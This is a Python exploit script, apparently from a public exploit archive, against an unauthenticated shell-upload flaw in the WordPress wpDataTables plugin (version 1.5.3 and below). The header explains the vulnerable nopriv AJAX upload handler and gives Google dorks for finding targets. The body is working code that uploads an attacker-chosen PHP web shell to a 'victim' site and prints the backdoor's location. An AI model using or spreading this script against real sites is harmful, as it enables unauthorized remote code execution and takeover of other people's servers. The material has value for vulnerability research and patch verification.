## Exploit Name: Wordpress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability# # Vulnerability discovered by Claudio Viviani## Date : 2014-11-22## Exploit written by Claudio Viviani## Video Demo: https://www.youtube.com/watch?v=44m4VNpeEVc## --------------------------------------------------------------------## Issue n.1 (wpdatatables.php)## This function is always available without wpdatatables edit permission:##    function wdt_upload_file(){#        require_once(PDT_ROOT_PATH.'lib/upload/UploadHandler.php');#        $uploadHandler = new UploadHandler();#        exit();#    }#    ...#    ...#    ...#    add_action( 'wp_ajax_wdt_upload_file', 'wdt_upload_file' );#    add_action( 'wp_ajax_nopriv_wdt_upload_file', 'wdt_upload_file' );# ## Issue n.2 (lib/upload/UploadHandler.php)## This php script allows you to upload any type of file## ---------------------------------------------------------------------## Dork google:  inurl:/plugins/wpdatatables#               inurl:codecanyon-3958969#               index of "wpdatatables"#               index of "codecanyon-3958969"## Tested on BackBox 3.x### http connectionimport urllib, urllib2, sys, re# Args managementimport optparse# file managementimport os, os.path
# Check urldef checkurl(url):    if url[:8] != "https://" and url[:7] != "http://":        print('[X] You must insert http:// or https:// procotol')        sys.exit(1)    else:        return url
# Check if file exists and has readabledef checkfile(file):    if not os.path.isfile(file) and not os.access(file, os.R_OK):        print '[X] '+file+' file is missing or not readable'        sys.exit(1)    else:        return file
# Create multipart headerdef create_body_sh3ll_upl04d(payloadname):
   getfields = dict()
   payloadcontent = open(payloadname).read()
   LIMIT = '----------lImIt_of_THE_fIle_eW_$'   CRLF = '\r\n'
   L = []   for (key, value) in getfields.items():      L.append('--' + LIMIT)      L.append('Content-Disposition: form-data; name="%s"' % key)      L.append('')      L.append(value)
   L.append('--' + LIMIT)   L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', payloadname))   L.append('Content-Type: application/force-download')   L.append('')   L.append(payloadcontent)   L.append('--' + LIMIT + '--')   L.append('')   body = CRLF.join(L)   return body
banner = """   ___ ___               __                                                           |   Y   .-----.----.--|  .-----.----.-----.-----.-----.                             |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|                             |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|                             |:      |                |__|                                                       |::.|:. |                                                                           `--- ---'                                                                                  ___ ___       ______         __         _______       __    __                        |   Y   .-----|   _  \ .---.-|  |_.---.-|       .---.-|  |--|  .-----.-----.           |.  |   |  _  |.  |   \|  _  |   _|  _  |.|   | |  _  |  _  |  |  -__|__ --|           |. / \  |   __|.  |    |___._|____|___._`-|.  |-|___._|_____|__|_____|_____|           |:      |__|  |:  1    /                  |:  |                                        |::.|:. |     |::.. . /                   |::.|                                        `--- ---'     `------'                    `---'                                                                                 
                                                        Sh311 Upl04d Vuln3r4b1l1ty                                                                 <= 1.5.3
                                   Written by:
                                 Claudio Viviani
                                 info@homelab.it                             homelabit@protonmail.ch
                        https://www.facebook.com/homelabit                          https://twitter.com/homelabit                          https://plus.google.com/+HomelabIt1/               https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww"""
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')commandList.add_option('-t', '--target', action="store",                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",                  )commandList.add_option('-f', '--file', action="store",                  help="Insert file name, ex: shell.php",                  )commandList.add_option('--timeout', action="store", default=10, type="int",                  help="[Timeout Value] - Default 10",                  )
options, remainder = commandList.parse_args()
# Check argsif not options.target or not options.file:    print(banner)    commandList.print_help()    sys.exit(1)
payloadname = checkfile(options.file)host = checkurl(options.target)timeout = options.timeout
url_wpdatatab_upload = host+'/wp-admin/admin-ajax.php?action=wdt_upload_file'
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
bodyupload = create_body_sh3ll_upl04d(payloadname)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',           'content-type': content_type,           'content-length': str(len(bodyupload)) }
try:   req = urllib2.Request(url_wpdatatab_upload, bodyupload, headers)   response = urllib2.urlopen(req)
   read = response.read()
   if "error" in read or read == "0":      print("[X] Upload Failed :(")   else:      backdoor_location = re.compile('\"url\":\"(.*?)\",\"').search(read).group(1)      print("[!] Shell Uploaded")      print("[!] Location: "+backdoor_location.replace("\\",""))except urllib2.HTTPError as e:   print("[X] Http Error: "+str(e))except urllib2.URLError as e:   print("[X] Connection Error: "+str(e))

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